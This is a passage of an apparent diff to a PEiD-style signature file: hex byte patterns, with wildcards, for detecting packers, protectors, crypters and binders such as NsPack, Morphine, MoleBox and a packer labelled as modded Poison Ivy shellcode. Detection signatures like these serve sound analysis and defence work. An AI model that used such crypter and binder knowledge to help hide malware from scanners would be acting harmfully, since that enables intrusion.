+signature = 55 8B EC 83 C4 F0 53 ?? ?? ?? ?? ?? 10 E8 7A F6 FF FF BE 68 66 00 10 33 C0 55 68 DB 40 00 10 64 FF 30 64 89 20 E8 FA F8 FF FF BA EC 40 00 10 8B C6 E8 F2 FA FF FF 8B D8 B8 6C 66 00 10 8B 16 E8 88 F2 FF FF B8 6C 66 00 10 E8 76 F2 FF FF 8B D0 8B C3 8B 0E E8 E3 E4 FF FF E8 2A F9 FF FF E8 C1 F8 FF FF B8 6C 66 00 10 8B 16 E8 6D FA FF FF E8 14 F9 FF FF E8 AB F8 FF FF 8B 06 E8 B8 E3 FF FF 8B D8 B8 6C 66 00 10 E8 38 F2 FF FF 8B D3 8B 0E E8 A7 E4 FF ?? ?? ?? ?? C4 FB FF FF E8 E7 F8 FF FF 8B C3 E8 B0 E3 FF FF E8 DB F8 FF FF 33 C0 5A 59 59 64 89 10 68 E2 40 00 10 C3 E9 50 EB FF FF EB F8 5E 5B E8 BB EF FF FF 00 00 00 43 41 31 38
+ep_only = true
+
+[Minke V1.0.1 -> Codius]
+signature = 26 3D 4F 38 C2 82 37 B8 F3 24 42 03 17 9B 3A 83 01 00 00 CC 00 00 00 00 06 00 00 00 01 64 53 74 75 62 00 10 55 54 79 70 65 73 00 00 C7 53 79 73 74 65 6D 00 00 81 53 79 73 49 6E 69 74 00 0C 4B 57 69 6E 64 6F 77 73 00 00 8A 75 46 75 6E 63 74 69 6F 6E 73
+ep_only = false
+
+[mkfpack -> llydd]
+signature = E8 00 00 00 00 5B 81 EB 05 00 00 00 8B 93 9F 08 00 00 53 6A 40 68 00 10 00 00 52 6A 00 FF 93 32 08 00 00 5B 8B F0 8B BB 9B 08 00 00 03 FB 56 57 E8 86 08 00 00 83 C4 08 8D 93 BB 08 00 00 52 53 FF E6
+ep_only = false
+
+[modified HACKSTOP v1.11f]
+signature = 52 B4 30 CD 21 52 FA ?? FB 3D ?? ?? EB ?? CD 20 0E 1F B4 09 E8
+ep_only = true
+
+[MoleBox v2.0]
+signature = E8 ?? ?? ?? ?? 60 E8 4F
+ep_only = false
+
+[MoleBox v2.3.0 -> Teggo]
+signature = 42 04 E8 ?? ?? 00 00 A3 ?? ?? ?? 00 8B 4D F0 8B 11 89 15 ?? ?? ?? 00 ?? 45 FC A3 ?? ?? ?? 00 5F 5E 8B E5 5D C3 CC CC CC CC CC CC CC CC CC CC CC E8 EB FB FF FF 58 E8 ?? 07 00 00 58 89 44 24 20 61 58 FF D0 E8 ?? ?? 00 00 CC CC CC CC CC CC CC
+ep_only = false
+
+[MoleBox V2.3X -> MoleStudio.com]
+signature = E8 00 00 00 00 60 E8 4F 00 00 00
+ep_only = true
+
+[MoleBox v2.5.4 -> Teggo]
+signature = ?? ?? ?? 00 8B 4D F0 8B 11 89 15 ?? ?? ?? 00 8B 45 FC A3 ?? ?? ?? 00 5F 5E 8B E5 5D C3 CC CC CC E8 EB FB FF FF 58 E8 ?? 07 00 00 58 89 44 24 24 61 58 58 FF D0 E8 ?? ?? 00 00 6A 00 FF 15 ?? ?? ?? 00 CC CC CC CC CC CC CC CC CC CC CC CC CC CC
+ep_only = false
+
+[Morphine v2.7 --> Holy_Father & Ratter/29A]
+signature = 00 00 00 00 6B 65 72 6E 65 6C 33 32 2E 64 6C 6C 00 00 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 00 00 4C 6F 61 64 4C 69 62 72 61 72 79 41 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+ep_only = false
+
+[Morphine v2.7 --> Holy_Father & Ratter/29A]
+signature = ?? ?? ?? ?? 00 00 00 00 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 6B 65 72 6E 65 6C 33 32 2E 64 6C 6C 00 00 47 65 74 50 72 6F 63
+ep_only = false
+
+[Morphine V2.7 -> Holy_Father & Ratter/29A]
+signature = 00 00 00 00 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 4B 65 52 6E 45 6C 33 32 2E 64 4C 6C 00 00 47 65 74 50 72 6F 63 41 64 64 72
+ep_only = false
+
+[Morphine v3.3 -> Silent Software & Silent Shield (c)2005]
+signature = 28 ?? ?? ?? 00 00 00 00 00 00 00 00 40 ?? ?? ?? 34 ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4C ?? ?? ?? 5C ?? ?? ?? 00 00 00 00 4C ?? ?? ?? 5C ?? ?? ?? 00 00 00 00 4B 65 52 6E 45 6C 33 32 2E 64 4C 6C 00 00 47 65 74 50 72 6F 63
+ep_only = false
+
+[Morphine v3.3 -> Silent Software & Silent Shield (c)2005]
+signature = 28 ?? ?? ?? 00 00 00 00 00 00 00 00 40 ?? ?? ?? 34 ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4C ?? ?? ?? 5C ?? ?? ?? 00 00 00 00 4C ?? ?? ?? 5C ?? ?? ?? 00 00 00 00 4B 65 52 6E 45 6C 33 32 2E 64 4C 6C 00 00 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 00 00 4C 6F 61 64 4C 69 62 72 61 72 79 41
+ep_only = false
+
+[mPack 0.0.3 -> DeltaAziz]
+signature = 55 8B EC 83 C4 F0 33 C0 89 45 F0 B8 A8 76 00 10 E8 67 C4 FF FF 33 C0 55 68 C2 78 00 10 64 FF 30 64 89 20 8D 55 F0 33 C0 E8 93 C8 FF FF 8B 45 F0 E8 87 CB FF FF A3 08 A5 00 10 33 C0 55 68 A5 78 00 10 64 FF 30 64 89 20 A1 08 A5 00 10 E8 FA C9 FF FF 83 F8 FF 75 0A E8 88 B2 FF FF E9 1B 01 00 00 C7 05 14 A5 00 10 32 00 00 00 A1 08 A5 00 10 8B 15 14 A5 00 10 E8 C9 C9 FF FF BA 14 A5 00 10 A1 08 A5 00 10 B9 04 00 00 00 E8 C5 C9 FF FF 83 3D 14 A5 00 10 32 77 0A E8 47 B2 FF FF E9 DA 00 00 00 A1 08 A5 00 10 8B 15 14 A5 00 10 E8 92 C9 FF FF BA 18 A5
+ep_only = true
+
+[MS Visual C++ v.8 DLL (h-small sig1)]
+signature = 8B FF 55 8B EC 83 7D 0C 01 75 05 E8 ?? ?? ?? FF 5D E9 D6 FE FF FF CC CC CC CC CC
+ep_only = true
+
+[MS Visual C++ v.8 DLL (h-small sig2)]
+signature = 8B FF 55 8B EC 53 8B 5D 08 56 8B 75 0C 85 F6 57 8B 7D 10 0F 84 ?? ?? 00 00 83 FE 01
+ep_only = true
+
+[mucki's protector I -> mucki]
+signature = BE ?? ?? ?? ?? B9 ?? ?? ?? ?? 8A 06 F6 D0 88 06 46 E2 F7 E9
+ep_only = true
+
+[mucki's protector II -> mucki]
+signature = E8 24 00 00 00 8B 4C 24 0C C7 01 17 00 01 00 C7 81 B8 00 00 00 00 00 00 00 31 C0 89 41 14 89 41 18 80 6A 00 E8 85 C0 74 12 64 8B 3D 18 00 00 00 8B 7F 30 0F B6 47 02 85 C0 74 01 C3 C7 04 24 ?? ?? ?? ?? BE ?? ?? ?? ?? B9 ?? ?? ?? ?? 8A 06 F6 D0 88 06 46 E2 F7 C3
+ep_only = true
+
+[MZ0oPE 1.0.6b --> TaskFall]
+signature = EB CA 89 03 83 C3 04 87 FE 32 C0 AE 75 FD 87 FE 80 3E FF 75 E2 46 5B 83 C3 04 53 8B 1B 80 3F FF 75 C9 8B E5 61 68 ?? ?? ?? ?? C3
+ep_only = true
+
+[MZ0oPE 1.0.6b -> TaskFall]
+signature = EB CA 89 03 83 C3 04 87 FE 32 C0 AE 75 FD 87 FE 80 3E FF 75 E2 46 5B 83 C3 04 53 8B 1B 80 3F FF 75 C9 8B E5 61 68 ?? ?? ?? ?? C3 FC B2 80 33 DB A4 B3 02 E8 6D 00 00 00 73 F6 33 C9 E8 64 00 00 00 73 1C 33 C0 E8 5B 00 00 00 73 23 B3 02 41 B0 10 E8 4F 00 00 00 12 C0 73 F7 75 3F AA EB D4 E8 4D 00 00 00 2B CB 75 10 E8 42 00 00 00 EB 28 AC D1 E8 74 4C 13 C9 EB 1C 91 48 C1 E0 08 AC E8 2C 00 00 00 3D 00 7D 00 00 73 0A 80 FC 05 73 06 83 F8 7F 77 02 41 41 95 8B C5 B3 01 56 8B F7 2B F0 F3 A4 5E EB 8E 02 D2 75 05 8A 16 46 12 D2 C3 33 C9 41 E8 EE FF FF FF 13 C9 E8 E7 FF FF FF 72 F2 C3
+ep_only = true
+
+[MZ_Crypt 1.0 - by BrainSt0rm]
+signature = 60 E8 00 00 00 00 5D 81 ED 25 14 40 00 8B BD 77 14 40 00 8B 8D 7F 14 40 00 EB 28 83 7F 1C 07 75 1E 8B 77 0C 03 B5 7B 14 40 00 33 C0 EB 0C 50 8A A5 83 14 40 00 30 26 58 40 46 3B 47 10 76 EF 83 C7 28 49 0B C9 75 D4 8B 85 73 14 40 00 89 44 24 1C 61 FF E0
+ep_only = false
+
+[N-Joiner 0.1 (Asm Version) -> NEX]
+signature = 6A 00 68 00 14 40 00 68 00 10 40 00 6A 00 E8 14 00 00 00 6A 00 E8 13 00 00 00 CC FF 25 AC 12 40 00 FF 25 B0 12 40 00 FF 25 B4 12 40 00 FF 25 B8 12 40 00 FF 25 BC 12 40 00 FF 25 C0 12 40 00 FF 25 C4 12 40 00 FF 25 C8 12 40 00 FF 25 CC 12 40 00 FF 25 D0 12 40 00 FF 25 D4 12 40 00 FF 25 D8 12 40 00 FF 25 DC 12 40 00 FF 25 E4 12 40 00 FF 25 EC 12 40 00
+ep_only = true
+
+[N-Joy 1.0 -> NEX]
+signature = 55 8B EC 83 C4 F0 B8 9C 3B 40 00 E8 8C FC FF FF 6A 00 68 E4 39 40 00 6A 0A 6A 00 E8 40 FD FF FF E8 EF F5 FF FF 8D 40 00
+ep_only = true
+
+[N-Joy 1.1 -> NEX]
+signature = 55 8B EC 83 C4 F0 B8 0C 3C 40 00 E8 24 FC FF FF 6A 00 68 28 3A 40 00 6A 0A 6A 00 E8 D8 FC FF FF E8 7F F5 FF FF 8D 40 00
+ep_only = true
+
+[N-Joy 1.2 -> NEX]
+signature = 55 8B EC 83 C4 F0 B8 A4 32 40 00 E8 E8 F1 FF FF 6A 00 68 54 2A 40 00 6A 0A 6A 00 E8 A8 F2 FF FF E8 C7 EA FF FF 8D 40 00
+ep_only = true
+
+[N-Joy 1.3 -> NEX]
+signature = 55 8B EC 83 C4 F0 B8 48 36 40 00 E8 54 EE FF FF 6A 00 68 D8 2B 40 00 6A 0A 6A 00 E8 2C EF FF FF E8 23 E7 FF FF 8D 40 00
+ep_only = true
+
+[Nakedbind 1.0 -> nakedcrew]
+signature = 64 8B 38 48 8B C8 F2 AF AF 8B 1F 66 33 DB 66 81 3B 4D 5A 74 08 81 EB 00 00
+ep_only = true
+
+[NakedPacker 1.0 - by BigBoote]
+signature = 60 FC 0F B6 05 34 ?? ?? ?? 85 C0 75 31 B8 50 ?? ?? ?? 2B 05 04 ?? ?? ?? A3 30 ?? ?? ?? A1 00 ?? ?? ?? 03 05 30 ?? ?? ?? A3 38 ?? ?? ?? E8 9A 00 00 00 A3 50 ?? ?? ?? C6 05 34 ?? ?? ?? 01 83 3D 50 ?? ?? ?? 00 75 07 61 FF 25 38 ?? ?? ?? 61 FF 74 24 04 6A 00 FF 15 44 ?? ?? ?? 50 FF 15 40 ?? ?? ?? C3 FF 74 24 04 6A 00 FF 15 44 ?? ?? ?? 50 FF 15 48 ?? ?? ?? C3 8B 4C 24 04 56 8B 74 24 10 57 85 F6 8B F9 74 0D 8B 54 24 10 8A 02 88 01
+ep_only = false
+
+[Native UD Packer 1.1 (Modded Poison Ivy Shellcode) -> okkixot]
+signature = 31 C0 31 DB 31 C9 EB 0E 6A 00 6A 00 6A 00 6A 00 FF 15 28 41 40 00 FF 15 94 40 40 00 89 C7 68 88 13 00 00 FF 15 98 40 40 00 FF 15 94 40 40 00 81 C7 88 13 00 00 39 F8 73 05 E9 84 00 00 00 6A 40 68 00 10 00 00 FF 35 04 30 40 00 6A 00 FF 15 A4 40 40 00 89 C7 FF 35 04 30 40 00 68 CA 10 40 00 50 FF 15 A8 40 40 00 6A 40 68 00 10 00 00 FF 35 08 30 40 00 6A 00 FF 15 A4 40 40 00 89 C6 68 00 30 40 00 FF 35 04 30 40 00 57 FF 35 08 30 40 00 50 6A 02 FF 15 4E 41 40 00 6A 00 6A 00 6A 00 56 6A 00 6A 00 FF 15 9C 40 40 00 50 6A 00 6A 00 6A 11 50 FF 15 4A 41 40 00 58 6A FF 50 FF 15 AC 40 40 00 6A 00 FF 15 A0 40
+ep_only = true
+
+[nBinder v3.6.1]
+signature = 6E 35 36 34 35 36 35 33 32 33 34 35 34 33 5F 6E 62 33 5C 00 5C 6E 35 36 34 35 36 35 33 32 33 34 35 34 33 5F 6E 62 33 5C
+ep_only = false
+
+[nBinder v4.0]
+signature = 5C 6E 62 34 5F 74 6D 70 5F 30 31 33 32 34 35 34 33 35 30 5C 00 00 00 00 00 00 00 00 00 E9 55 43 4C FF 01 1A 00 00 00 00 96 30 07 77 2C 61 0E EE BA 51 09 99 19 C4 6D 07 8F F4 6A 70 35 A5 63 E9 A3 95 64 9E 32 88 DB 0E A4 B8 DC 79
+ep_only = false
+
+[nbuild v1.0 [soft]]
+signature = B9 ?? ?? BB ?? ?? C0 ?? ?? 80 ?? ?? 43 E2
+ep_only = true
+
+[NeoLite v1.0]
+signature = 8B 44 24 04 8D 54 24 FC 23 05 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? 50 FF 25
+ep_only = true
+
+[NeoLite v2.0]
+signature = E9 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 4E 65 6F 4C 69 74 65
+ep_only = true
+
+[NeoLite v2.00]
+signature = 8B 44 24 04 23 05 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 04 FE 05 ?? ?? ?? ?? 0B C0 74
+ep_only = true
+
+[NFO v1.0]
+signature = 8D 50 12 2B C9 B1 1E 8A 02 34 77 88 02 42 E2 F7 C8 8C
+ep_only = true
+
+[Ningishzida 1.0 -> CyberDoom]
+signature = 9C 60 96 E8 00 00 00 00 5D 81 ED 03 25 40 00 B9 04 1B 00 00 8D BD 4B 25 40 00 8B F7 AC ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? AA E2 CC
+ep_only = true
+
+[nMacro recorder 1.0]
+signature = 5C 6E 6D 72 5F 74 65 6D 70 2E 6E 6D 72 00 00 00 72 62 00 00 58 C7 41 00 10 F8 41 00 11 01 00 00 00 00 00 00 46 E1 00 00 46 E1 00 00 35 00 00 00 F6 88 41 00
+ep_only = false
+
+[NME 1.1 Public - by redlime]
+signature = 55 8B EC 83 C4 F0 53 56 B8 30 35 14 13 E8 9A E6 FF FF 33 C0 55 68 6C 36 14 13 64 FF 30 64 89 20 B8 08 5C 14 13 BA 84 36 14 13 E8 7D E2 FF FF E8 C0 EA FF FF 8B 15 CC 45 14 13 A1 C8 45 14 13 E8 04 F8 FF FF 8B 15 D0 45 14 13 A1 C8 45 14 13 E8 F4 F7 FF FF 8B 15 CC 45 14 13 A1 C8 45 14 13 E8 2C F9 FF FF A3 F8 5A 14 13 8B 15 D0 45 14 13 A1 C8 45 14 13 E8 17 F9 FF FF A3 FC 5A 14 13 B8 04 5C 14 13 E8 20 FB FF FF 8B D8 85 DB 74 48 B8 00 5B 14 13 8B 15 C4 45 14 13 E8 1E E7 FF FF A1 04 5C 14 13 E8 A8 DA FF FF ?? ?? ?? ?? 5C 14 13 50 8B CE 8B D3 B8 00 5B 14 13 ?? ?? ?? ?? FF 8B C6 E8 DF FB FF FF 8B C6 E8 9C DA FF FF B8 00 5B 14 13 E8 72 E7 FF FF 33 C0 5A 59 59 64 89 10 68 73 36 14 13 C3 E9 0F DF FF FF EB F8 5E 5B E8 7E E0 FF FF 00 00 FF FF FF FF 0C 00 00 00 4E 4D 45 20 31 2E 31 20 53 74 75 62
+ep_only = false
+
+[NoodleCrypt v2.0]
+signature = EB 01 9A E8 3D 00 00 00 EB 01 9A E8 EB 01 00 00 EB 01 9A E8 2C 04 00 00 EB 01
+ep_only = true
+
+[NoodleCrypt v2.0]
+signature = EB 01 9A E8 ?? 00 00 00 EB 01 9A E8 ?? ?? 00 00 EB 01 9A E8 ?? ?? 00 00 EB 01
+ep_only = false
+
+[NoodleCrypt v2.00 (Eng) -> NoodleSpa]
+signature = EB 01 9A E8 76 00 00 00 EB 01 9A E8 65 00 00 00 EB 01 9A E8 7D 00 00 00 EB 01 9A E8 55 00 00 00 EB 01 9A E8 43 04 00 00 EB 01 9A E8 E1 00 00 00 EB 01 9A E8 3D 00 00 00 EB 01 9A E8 EB 01 00 00 EB 01 9A E8 2C 04 00 00 EB 01 9A E8 25 00 00 00 EB 01 9A E8 02
+ep_only = true
+
+[Noodlecrypt2 -> r!sc]
+signature = EB 01 9A E8 76 00 00 00
+ep_only = true
+
+[North Star PE Shrinker 1.3 -> Liuxingping]
+signature = 9C 60 E8 00 00 00 00 5D B8 B3 85 40 00 2D AC 85 40 00 2B E8 8D B5
+ep_only = true
+
+[North Star PE Shrinker v1.3 by Liuxingping]
+signature = 9C 60 E8 00 00 00 00 5D B8 B3 85 40 00 2D AC 85 40 00 2B E8 8D B5 73 ?? FF FF 8B 06 83 F8 00 74 11 8D B5 7F ?? FF FF 8B 06 83 F8 01 0F 84 F1 01 00 00 C7 06 01 00 00 00 8B D5 8B 85 4F ?? FF FF 2B D0 89 95 4F ?? FF FF 01 95 67 ?? FF FF 8D B5 83 ?? FF FF 01
+ep_only = false
+
+[nPack 1.1.150.2006.Beta -> NEOx]
+signature = 83 3D ?? ?? ?? ?? ?? 75 05 E9 01 00 00 00 C3 E8 41 00 00 00 B8 ?? ?? ?? ?? 2B 05 ?? ?? ?? ?? A3 ?? ?? ?? ?? E8 5E 00 00 00 E8 E0 01 00 00 E8 EC 06 00 00 E8 F7 05 00 00 A1 ?? ?? ?? ?? C7 05 ?? ?? ?? ?? ?? ?? ?? ?? 01 05 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? C3 C3 56 57 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 8B F8 68 ?? ?? ?? ?? 57 FF D6 68 ?? ?? ?? ?? 57 A3 ?? ?? ?? ?? FF D6 5F A3 ?? ?? ?? ?? 5E C3
+ep_only = true
+
+[nPack 1.1.300.2006 Beta -> NEOx]
+signature = 83 3D ?? ?? ?? ?? ?? 75 05 E9 01 00 00 00 C3 E8 46 00 00 00 E8 73 00 00 00 B8 ?? ?? ?? ?? 2B 05 ?? ?? ?? ?? A3 ?? ?? ?? ?? E8 9C 00 00 00 E8 2D 02 00 00 E8 DD 06 00 00 E8 2C 06 00 00 A1 ?? ?? ?? ?? C7 05 ?? ?? ?? ?? ?? ?? ?? ?? 01 05 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? C3 C3 56 57 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 8B F8 68 ?? ?? ?? ?? 57 FF D6 68 ?? ?? ?? ?? 57 A3 ?? ?? ?? ?? FF D6 5F A3 ?? ?? ?? ?? 5E C3
+ep_only = true
+
+[nPack v1.1 150-200 Beta -> NEOx]
+signature = 83 3D 40 ?? ?? ?? 00 75 05 E9 01 00 00 00 C3 E8 41 00 00 00 B8 80 ?? ?? ?? 2B 05 08 ?? ?? ?? A3 3C ?? ?? 00 E8 5E 00 00 00 E8 E0 01 00 00 E8 EC 06 00 00 E8 F7 05 00 00
+ep_only = true
+
+[nPack v1.1 250 Beta -> NEOx]
+signature = 83 3D 04 ?? ?? ?? 00 75 05 E9 01 00 00 00 C3 E8 46 00 00 00 E8 73 00 00 00 B8 2E ?? ?? ?? 2B 05 08 ?? ?? ?? A3 00 ?? ?? ?? E8 9C 00 00 00 E8 04 02 00 00 E8 FB 06 00 00 E8 1B 06 00 00 A1 00 ?? ?? ?? C7 05 04 ?? ?? ?? 01 00 00 00 01 05 00 ?? ?? ?? FF 35 00
+ep_only = true
+
+[nPack V1.1.150.2006.Beta -> NEOx/[uinC]]
+signature = 83 3D 40 ?? ?? ?? 00 75 05 E9 01 00 00 00 C3 E8 41 00 00 00 B8 80 ?? ?? ?? 2B 05 08 ?? ?? ?? A3 3C ?? ?? ?? E8 5E 00 00 00 E8 E0 01 00 00 E8 EC 06 00 00 E8 F7 05 00 00 A1 3C ?? ?? ?? C7 05 40 ?? ?? ?? 01 00 00 00 01 05 00 ?? ?? ?? FF 35 00 ?? ?? ?? C3 C3
+ep_only = true
+
+[nPack V1.1.200.2006.Beta -> NEOx/[uinC]]
+signature = 83 3D 40 ?? ?? ?? 00 75 05 E9 01 00 00 00 C3 E8 41 00 00 00 B8 80 ?? ?? ?? 2B 05 08 ?? ?? ?? A3 3C ?? ?? ?? E8 5E 00 00 00 E8 EC 01 00 00 E8 F8 06 00 00 E8 03 06 00 00 A1 3C ?? ?? ?? C7 05 40 ?? ?? ?? 01 00 00 00 01 05 00 ?? ?? ?? FF 35 00 ?? ?? ?? C3 C3
+ep_only = true
+
+[NSIS Installer --> NullSoft]
+signature = 83 EC 20 53 55 56 33 DB 57 89 5C 24 18 C7 44 24 10 ?? ?? ?? ?? C6 44 24 14 20 FF 15 30 70 40 00 53 FF 15 80 72 40 00 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? A3 ?? ?? ?? ?? E8 ?? ?? ?? ?? BE
+ep_only = true
+
+[NsPacK .Net -> LiuXingPing]
+signature = 56 69 72 74 75 61 6C 50 72 6F 74 65 63 74 00 00 BB 01 47 65 74 53 79 73 74 65 6D 49 6E 66 6F 00 4B 45 52 4E 45 4C 33 32 2E 64 6C 6C 00 00 5E 00 5F 43 6F 72 ?? ?? ?? 4D 61 69 6E 00 6D 73 63 6F 72 65 65 2E 64 6C 6C
+ep_only = false
+
+[NsPack 1.4 -> Liuxingping]
+signature = 9C 60 E8 00 00 00 00 5D B8 ?? ?? 40 00 2D ?? ?? 40 00
+ep_only = true
+
+[NsPack 1.4 by North Star (Liu Xing Ping)]
+signature = 8B DF 83 3F 00 75 0A 83 C7 04 B9 00 00 00 00 EB 16 B9 01 00 00 00 03 3B 83 C3 04 83 3B 00 74 2D 01 13 8B 33 03 7B 04 57 51 52 53
+ep_only = false
+
+[NsPack 2.9 -> North Star]
+signature = 9C 60 E8 00 00 00 00 5D B8 07 00 00 00 2B E8 8D B5 ?? ?? FF FF 8A 06 3C 00 74 12 8B F5 8D B5 ?? ?? FF FF 8A 06 3C 01 0F 84 42 02 00 00 C6 06 01 8B D5 2B 95 ?? ?? FF FF 89 95 ?? ?? FF FF 01 95 ?? ?? FF FF 8D B5 ?? ?? FF FF 01 16 60 6A 40 68 00 10 00 00 68 00 10 00 00 6A 00 FF 95 ?? ?? FF FF 85 C0 0F 84 6A 03 00 00 89 85 ?? ?? FF FF E8 00 00 00 00 5B B9 68 03 00 00 03 D9 50 53 E8 B1 02 00 00 61 8B 36 8B FD 03 BD ?? ?? FF FF 8B DF 83 3F 00 75 0A 83 C7 04 B9 00 00 00 00 EB 16 B9 01 00 00 00 03 3B 83 C3 04 83 3B 00 74 36
+ep_only = true
+
+[NsPack 3.0 -> North Star]
+signature = 9C 60 E8 00 00 00 00 5D B8 07 00 00 00 2B E8 8D B5 ?? ?? FF FF 66 8B 06 66 83 F8 00 74 15 8B F5 8D B5 ?? ?? FF FF 66 8B 06 66 83 F8 01 0F 84 42 02 00 00 C6 06 01 8B D5 2B 95 ?? ?? FF FF 89 95 ?? ?? FF FF 01 95 ?? ?? FF FF 8D B5 ?? ?? FF FF 01 16 60 6A 40 68 00 10 00 00 68 00 10 00 00 6A 00 FF 95 ?? ?? FF FF 85 C0 0F 84 6A 03 00 00 89 85 ?? ?? FF FF E8 00 00 00 00 5B B9 68 03 00 00 03 D9 50 53 E8 B1 02 00 00 61 8B 36 8B FD 03 BD ?? ?? FF FF 8B DF 83 3F 00 75 0A 83 C7 04 B9 00 00 00 00 EB 16 B9 01 00 00 00 03 3B 83 C3 04 83 3B 00 74 36
+ep_only = true
+
+[NsPack 3.4 -> North Star]
+signature = 9C 60 E8 00 00 00 00 5D 83 ED 07 8D 85 ?? ?? FF FF 80 38 01 0F 84 42 02 00 00 C6 00 01 8B D5 2B 95 ?? ?? FF FF 89 95 ?? ?? FF FF 01 95 ?? ?? FF FF 8D B5 ?? ?? FF FF 01 16 60 6A 40 68 00 10 00 00 68 00 10 00 00 6A 00 FF 95 ?? ?? FF FF 85 C0 0F 84 6A 03 00 00 89 85 ?? ?? FF FF E8 00 00 00 00 5B B9 68 03 00 00 03 D9 50 53 E8 B1 02 00 00 61 8B 36 8B FD 03 BD ?? ?? FF FF 8B DF 83 3F 00 75 0A 83 C7 04 B9 00 00 00 00 EB 16 B9 01 00 00 00 03 3B 83 C3 04 83 3B 00 74 36 01 13 8B 33 03 7B 04 57 51 52 53 FF B5 ?? ?? FF FF FF B5 ?? ?? FF FF 8B D6 8B CF 8B 85 ?? ?? FF FF 05 AA 05 00 00 FF D0 5B 5A 59 5F 83 F9 00 74 05 83 C3 08 EB C5
+ep_only = true
+
+[NSPack 3.x -> Liu Xing Ping]
+signature = 9C 60 E8 00 00 00 00 5D 83 ED 07 8D 85 ?? ?? FF FF ?? 38 01 0F 84 ?? 02 00 00 ?? 00 01
+ep_only = true
+
+[NsPack V1.1 -> LiuXingPing]
+signature = 9C 60 E8 00 00 00 00 5D B8 57 84 40 00 2D 50 84 40 00
+ep_only = true
+
+[NsPack V1.3 -> LiuXingPing]
+signature = 9C 60 E8 00 00 00 00 5D B8 B3 85 40 00 2D AC 85 40 00
+ep_only = true
+
+[NsPack V1.4 -> LiuXingPing]
+signature = 9C 60 E8 00 00 00 00 5D B8 B1 85 40 00 2D AA 85 40 00
+ep_only = true
+
+[nSpack V2.3 -> LiuXingPing]
+signature = 9C 60 70 61 63 6B 24 40
+ep_only = false
+
+[NsPack v2.3 -> North Star]
+signature = 9C 60 E8 00 00 00 00 5D B8 07 00 00 00 2B E8 8D B5 ?? ?? FF FF 8B 06 83 F8 00 74 11 8D B5 ?? ?? FF FF 8B 06 83 F8 01 0F 84 4B 02 00 00 C7 06 01 00 00 00 8B D5 8B 85 ?? ?? FF FF 2B D0 89 95 ?? ?? FF FF 01 95 ?? ?? FF FF 8D B5 ?? ?? FF FF 01 16 8B 36 8B FD
+ep_only = false
+
+[NsPack v2.3 -> North Star]
+signature = 9C 60 E8 00 00 00 00 5D B8 07 00 00 00 2B E8 8D B5 ?? ?? FF FF 8B 06 83 F8 00 74 11 8D B5 ?? ?? FF FF 8B 06 83 F8 01 0F 84 4B 02 00 00 C7 06 01 00 00 00 8B D5 8B 85 ?? ?? FF FF 2B D0 89 95 ?? ?? FF FF 01 95 ?? ?? FF FF 8D B5 ?? ?? FF FF 01 16 8B 36 8B FD 60 6A 40 68 00 10 00 00 68 00 10 00 00 6A 00 FF 95 ?? ?? FF FF 85 C0 0F 84 56 03 00 00 89 85 ?? ?? FF FF E8 00 00 00 00 5B B9 54 03 00 00 03 D9 50 53 E8 9D 02 00 00 61
+ep_only = false
+
+[NsPack V2.X -> LiuXingPing]
+signature = 6E 73 70 61 63 6B 24 40
+ep_only = false
+
+[nSpack V2.x -> LiuXingPing]
+signature = 9C 60 E8 00 00 00 00 5D B8 07 00 00 00 2B E8 8D B5
+ep_only = false
+
+[NsPacK V3.0 -> LiuXingPing]
+signature = 9C 60 E8 00 00 00 00 5D B8 07 00 00 00 2B E8 8D B5 ?? ?? ?? ?? 66 8B 06 66 83 F8 00 74
+ep_only = true
+
+[NsPacK V3.1 -> LiuXingPing]
+signature = 9C 60 E8 00 00 00 00 5D 83 ED 07 8D 9D ?? ?? ?? ?? 8A 03 3C 00 74
+ep_only = true
+
+[NsPack v3.1 -> North Star]
+signature = 9C 60 E8 00 00 00 00 5D 83 ED 07 8D 9D ?? ?? FF FF 8A 03 3C 00 74 10 8D 9D ?? ?? FF FF 8A 03 3C 01 0F 84 42 02 00 00 C6 03 01 8B D5 2B 95 ?? ?? FF FF 89 95 ?? ?? FF FF 01 95 ?? ?? FF FF 8D B5 ?? ?? FF FF 01 16 60 6A 40 68 00 10 00 00 68 00 10 00 00 6A 00
+ep_only = true
+
+[NsPack v3.1 -> North Star]
